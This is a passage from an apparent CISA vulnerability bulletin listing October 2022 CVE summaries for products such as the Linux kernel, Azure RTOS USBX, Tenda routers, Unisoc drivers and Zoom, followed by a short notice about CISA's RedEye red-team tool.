linux — linux_kernel In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices. 2022-10-14 not yet calculated CVE-2022-42722
MISC
MISC
MISC
FEDORA
FEDORA
microsoft — azure Azure RTOS USBX is a high-performance USB host, device, and on-the-go (OTG) embedded stack that is fully integrated with Azure RTOS ThreadX. In [_ux_host_class_pima_read](https://github.com/azure-rtos/usbx/blob/master/common/usbx_host_classes/src/ux_host_class_pima_read.c), the data length from the device response, returned in the very first packet, is read by [L165 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L165) as header_length. Then in [L178 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L178), there is an “if” branch, which checks the expression “(header_length - UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE) > data_length”; if header_length is smaller than UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE, the calculation could overflow, and then in [L182 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L182) the calculation of data_length also overflows. This way the later [while loop starting from L192](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L192) can move data_pointer to an unexpected address and cause a write buffer overflow. The fix has been included in USBX release [6.1.12](https://github.com/azure-rtos/usbx/releases/tag/v6.1.12_rel). The following can be used as a workaround: Add a check of `header_length`: 1. It must be greater than `UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE`. 2. It should be greater than or equal to the current returned data length (`transfer_request -> ux_transfer_request_actual_length`). 2022-10-13 not yet calculated CVE-2022-39293
MISC
CONFIRM
mikrotik — routeros The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as exploited in the wild in mid-2017 and later. 2022-10-15 not yet calculated CVE-2017-20149
MISC
MISC
multiple_vendors — multiple_products Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected. 2022-10-14 not yet calculated CVE-2022-41715
MISC
MISC
MISC
MISC
nss — nss A vulnerability was found in nss. The nss client auth crashes without a user certificate in the database, which can lead to a segmentation fault or crash. 2022-10-14 not yet calculated CVE-2022-3479
MISC
MISC
october — october October is a self-hosted Content Management System (CMS) platform based on the Laravel PHP Framework. This vulnerability only affects installations that rely on the safe mode restriction, commonly used when providing public access to the admin panel. Assuming an attacker has access to the admin panel and permission to open the “Editor” section, they can bypass the Safe Mode (`cms.safe_mode`) restriction to introduce new PHP code in a CMS template using a specially crafted request. The issue has been patched in versions 2.2.34 and 3.0.66. 2022-10-13 not yet calculated CVE-2022-35944
CONFIRM
octopus_deploy — server In affected versions of Octopus Server it is possible to use the Git Connectivity test function on the VCS project to initiate an SMB request resulting in the potential for an NTLM relay attack. 2022-10-14 not yet calculated CVE-2022-2780
MISC
oxhoo_tp50 — oxhoo_tp50 An issue in OXHOO TP50 OXH1.50 allows unauthenticated attackers to access the administrative panel via browsing to the URL http://device_ip/index1.html. 2022-10-14 not yet calculated CVE-2022-41436
MISC
perfact — openvpn-client In PerFact OpenVPN-Client versions 1.4.1.0 and prior, an attacker can send the config command from any application running on the local host machine to force the back-end server into initializing a new open-VPN instance with arbitrary open-VPN configuration. This could result in the attacker achieving execution with privileges of a SYSTEM user. 2022-10-14 not yet calculated CVE-2021-27406
CONFIRM
ree6 — ree6 Ree6 is a moderation bot. This vulnerability would allow other server owners to create configurations such as “Better-Audit-Logging” which contain a channel from another server as a target. This would mean you could send log messages to another Guild channel and bypass raid and webhook protections. A specifically crafted log message could allow spamming and mass advertisements. This issue has been patched in version 1.9.9. There are currently no known workarounds. 2022-10-14 not yet calculated CVE-2022-39302
CONFIRM
MISC
resistiot — iot_platform_+_lowrawan_network_server SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive. 2022-10-13 not yet calculated CVE-2022-34022
MISC
simple_cold_storage_management_system — simple_cold_storage_management_system Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/classes/Master.php?f=delete_storage. 2022-10-14 not yet calculated CVE-2022-42232
MISC
sourcecodester — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 suffers from an Insecure Direct Object Reference (IDOR) vulnerability. 2022-10-14 not yet calculated CVE-2022-42067
MISC
MISC
sourcecodester — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 is vulnerable to Cross Site Request Forgery (CSRF). 2022-10-14 not yet calculated CVE-2022-42070
MISC
MISC
sourcecodester — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 suffers from a Cross Site Scripting (XSS) Vulnerability. 2022-10-14 not yet calculated CVE-2022-42071
MISC
MISC
sourcecodester — online_tours_&_travels_management_system Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /user/update_booking.php. 2022-10-14 not yet calculated CVE-2022-41416
MISC
sourcecodester — sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_borrower.php. 2022-10-14 not yet calculated CVE-2022-41535
MISC
sourcecodester — sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_user.php. 2022-10-14 not yet calculated CVE-2022-41536
MISC
sourcecodester — sanitization_management_system A vulnerability classified as problematic was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Quote Requests Tab. The manipulation of the argument Manage Remarks leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-211015. 2022-10-15 not yet calculated CVE-2022-3519
MISC
sourcecodester — sanitization_management_system A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability. 2022-10-15 not yet calculated CVE-2022-3518
MISC
sourcecodester — sanitization_management_system A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210839. 2022-10-14 not yet calculated CVE-2022-3504
N/A
N/A
sourcecodester — sanitization_management_system A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210840. 2022-10-14 not yet calculated CVE-2022-3505
N/A
N/A
sourcecodester — wedding_planner Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /Wedding-Management-PHP/admin/photos_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-14 not yet calculated CVE-2022-41538
MISC
sourcecodester — wedding_planner Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /admin/users_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-14 not yet calculated CVE-2022-41539
MISC
tenda — ac1200 Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x475dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41480
MISC
MISC
tenda — ac1200 Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47de1c function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41481
MISC
MISC
tenda — ac1200 Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x4a12cc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41483
MISC
MISC
tenda — ac1200 Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47ce00 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41485
MISC
MISC
tenda — ac1200 Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47c5dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41482
MISC
MISC
tenda — ac1900 Tenda AC1900 AP500(US)_V1_180320(Beta) was discovered to contain a buffer overflow in the 0x32384 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. 2022-10-13 not yet calculated CVE-2022-41484
MISC
MISC
triangle_microworks — multiple_products The Triangle Microworks IEC 61850 Library (Any client or server using the C language library with a version number of 11.2.0 or earlier and any client or server using the C++, C#, or Java language library with a version number of 5.0.1 or earlier) and 60870-6 (ICCP/TASE.2) Library (Any client or server using a C++ language library with a version number of 4.4.3 or earlier) are vulnerable to access given to a small number of uninitialized pointers within their code. This could allow an attacker to target any client or server using the affected libraries to cause a denial-of-service condition. 2022-10-11 not yet calculated CVE-2022-38138
MISC
ucms — ucms There is a file inclusion vulnerability in the template management module in UCMS 1.6. 2022-10-14 not yet calculated CVE-2022-42234
MISC
unisoc — multiple_products In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-38671
MISC
unisoc — multiple_products In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-38690
MISC
unisoc — multiple_products In cell service, there is a missing permission check. This could lead to local denial of service in cell service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38677
MISC
unisoc — multiple_products In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-38673
MISC
unisoc — multiple_products In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-38672
MISC
unisoc — multiple_products In gpu driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-38676
MISC
unisoc — multiple_products In jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-2984
MISC
unisoc — multiple_products In messaging service, there is a missing permission check. This could lead to local denial of service in messaging service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38687
MISC
unisoc — multiple_products In messaging service, there is a missing permission check. This could lead to access to an unexpected provider in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38697
MISC
unisoc — multiple_products In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38698
MISC
unisoc — multiple_products In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39080
MISC
unisoc — multiple_products In Gallery service, there is a missing permission check. This could lead to local denial of service in Gallery service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39103
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39105
MISC
unisoc — multiple_products In Soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in Soundrecorder service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39107
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39109
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39111
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39112
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39113
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39114
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39115
MISC
unisoc — multiple_products In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39117
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39120
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39121
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39122
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39123
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39124
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39125
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39126
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39127
MISC
unisoc — multiple_products In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 not yet calculated CVE-2022-39128
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39108
MISC
unisoc — multiple_products In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-39110
MISC
unisoc — multiple_products In music service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-2985
MISC
unisoc — multiple_products In music service, there is a missing permission check. This could lead to local denial of service in music service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38679
MISC
unisoc — multiple_products In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38670
MISC
unisoc — multiple_products In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38669
MISC
unisoc — multiple_products In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38688
MISC
unisoc — multiple_products In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 not yet calculated CVE-2022-38689
MISC
webid — webid A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories. 2022-10-14 not yet calculated CVE-2022-41477
MISC
webpack — loader-utils A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js. 2022-10-14 not yet calculated CVE-2022-37603
MISC
MISC
MISC
wolfssl — wolfssl An issue was discovered in wolfSSL before 5.5.0. A fault injection attack on RAM via Rowhammer leads to ECDSA key disclosure. Users performing signing operations with private ECC keys, such as in server-side TLS connections, might leak faulty ECC signatures. These signatures can be processed via an advanced technique for ECDSA key recovery. (In 5.5.0 and later, WOLFSSL_CHECK_SIG_FAULTS can be used to address the vulnerability.) 2022-10-15 not yet calculated CVE-2022-42961
MISC
wordpress — wordpress Cross-site Scripting (XSS) – Stored in GitHub repository barrykooij/related-posts-for-wp prior to 2.1.3. 2022-10-14 not yet calculated CVE-2022-3506
CONFIRM
MISC
wordpress — wordpress Sensitive Data Exposure in Villatheme ALD – AliExpress Dropshipping and Fulfillment for WooCommerce premium plugin <= 1.1.0 on WordPress. 2022-10-14 not yet calculated CVE-2022-41623
CONFIRM
CONFIRM
zoom — client_for_meetings Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain Zoom Apps, a local debugging port is opened by the Zoom client. A local malicious user could use this debugging port to connect to and control the Zoom Apps running in the Zoom client. 2022-10-14 not yet calculated CVE-2022-28762
MISC
zoom — on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220916.131 contains an improper access control vulnerability. As a result, a malicious actor in a meeting or webinar they are authorized to join could prevent participants from receiving audio and video causing meeting disruptions. 2022-10-14 not yet calculated CVE-2022-28761
MISC
zoom — on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions. 2022-10-14 not yet calculated CVE-2022-28759
MISC
zoom — on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions. 2022-10-14 not yet calculated CVE-2022-28760
MISC

This product is provided subject to this Notification and this Privacy & Use policy.

CISA Releases RedEye: Red Team Campaign Visualization and Reporting Tool

Original release date: October 14, 2022

CISA has released RedEye, an interactive open-source analytic tool to visualize and report Red Team command and control activities. RedEye allows an operator to quickly assess complex data, evaluate mitigation strategies, and enable effective decision making.

For more information, CISA encourages users to review RedEye on GitHub and watch CISA’s RedEye tool overview video.

For Emergency Cyber Security Incident Response, please email RedTeam@DefendEdge.com